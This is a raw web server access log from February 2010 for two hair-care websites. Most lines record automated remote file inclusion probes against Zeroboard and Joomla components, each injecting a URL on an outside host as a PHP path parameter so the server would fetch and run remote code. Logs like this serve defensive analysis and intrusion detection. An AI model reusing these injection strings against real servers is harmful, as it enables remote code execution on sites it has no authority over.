218.38.136.126 - - [08/Feb/2010:00:48:39 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:48:39 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:48:39 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:48:47 -0800] "GET /logs/access_100125.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:49:41 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:49:41 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:49:41 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:49:56 -0800] "GET /logs/access_100125.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:50:38 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:50:38 -0800] "GET /logs/access_100125.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:50:45 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:51:19 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:51:19 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:51:19 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:52:59 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:52:59 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.126 - - [08/Feb/2010:00:52:59 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:56:59 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:57:09 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:57:09 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:00:57:55 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:00:57:55 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:00:57:55 -0800] "GET /logs/access_091221.log%20%20///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:00:57:55 -0800] "GET /logs/access_100125.log%20%20///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:00:58:37 -0800] "GET /logs/access_091123.log///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:00:58:37 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:00:58:37 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:58:51 -0800] "GET /logs/access_100125.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:00:59:15 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:00:59:15 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:00:59:15 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.125 - - [08/Feb/2010:00:59:44 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:59:44 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:00:59:49 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:00:42 -0800] "GET /logs/access_100111.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:01:01 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:01:01 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:01:01:01 -0800] "GET /logs/access.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:01:05 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:01:02:03 -0800] "GET /logs/access_100118.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:01:02:44 -0800] "GET /logs/access_091207.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:03:04 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:03:04 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:03:04 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.38.136.125 - - [08/Feb/2010:01:03:21 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:03:21 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:03:21 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:03:21 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:03:21 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:03:21 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:03:29 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:04:39 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:04:39 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:04:39 -0800] "GET /logs/access_100118.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.115.6.13 - - [08/Feb/2010:01:05:10 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:06:09 -0800] "GET /logs/access_100111.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:07:31 -0800] "GET /logs/access_100111.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.27.148.43 - - [08/Feb/2010:01:08:01 -0800] "GET / HTTP/1.1" 200 926 "http://www.google.com.pk/search?hl=en&source=hp&q=growlonghairfast.com&meta=&aq=0&oq=growlo" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.3)" "www.growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:01:09:49 -0800] "GET /logs/access.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Feb/2010:01:11:04 -0800] "GET /logs/access_091207.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Feb/2010:01:11:04 -0800] "GET /logs/access_100118.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:11:10 -0800] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:11:10 -0800] "GET /delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:11:10 -0800] "GET /logs/delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.176.226.164 - - [08/Feb/2010:01:11:32 -0800] "GET /logs/delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:11:32 -0800] "GET /delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.176.226.164 - - [08/Feb/2010:01:11:32 -0800] "GET /logs/access_100125.log%20%20/delete_all.php?board_skin_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:13:29 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:13:29 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:13:32 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.115.111.245 - - [08/Feb/2010:01:14:15 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
69.174.48.203 - - [08/Feb/2010:01:14:21 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.174.48.203 - - [08/Feb/2010:01:14:21 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.174.48.203 - - [08/Feb/2010:01:14:21 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
218.38.136.125 - - [08/Feb/2010:01:15:06 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:15:10 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:15:28 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:15:28 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:15:28 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:15:33 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:18:19 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:18:23 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:18:26 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.221.175.60 - - [08/Feb/2010:01:18:26 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
89.221.175.60 - - [08/Feb/2010:01:18:26 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
89.221.175.60 - - [08/Feb/2010:01:18:27 -0800] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
69.174.48.203 - - [08/Feb/2010:01:20:08 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.174.48.203 - - [08/Feb/2010:01:20:08 -0800] "GET /delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.174.48.203 - - [08/Feb/2010:01:20:08 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.174.48.203 - - [08/Feb/2010:01:21:32 -0800] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.174.48.203 - - [08/Feb/2010:01:21:32 -0800] "GET /delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
69.174.48.203 - - [08/Feb/2010:01:21:32 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:21:43 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:21:43 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:21:46 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:21:49 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:21:49 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:21:49 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.221.175.60 - - [08/Feb/2010:01:22:20 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
89.221.175.60 - - [08/Feb/2010:01:22:20 -0800] "GET /delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
89.221.175.60 - - [08/Feb/2010:01:22:20 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
91.212.226.210 - - [08/Feb/2010:01:22:43 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.212.226.210 - - [08/Feb/2010:01:22:44 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:22:56 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:22:58 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:22:58 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "growlonghairfast.com"
89.221.175.60 - - [08/Feb/2010:01:23:45 -0800] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.221.175.60 - - [08/Feb/2010:01:23:45 -0800] "GET /delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.221.175.60 - - [08/Feb/2010:01:23:45 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:25:01 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:25:01 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "growlonghairfast.com"
218.38.136.125 - - [08/Feb/2010:01:25:05 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:25:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:25:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:25:07 -0800] "GET /logs/access_091207.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
221.143.40.35 - - [08/Feb/2010:01:25:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:25:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
221.143.40.35 - - [08/Feb/2010:01:25:11 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.226.134.29 - - [08/Feb/2010:01:25:41 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
200.226.134.29 - - [08/Feb/2010:01:25:42 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
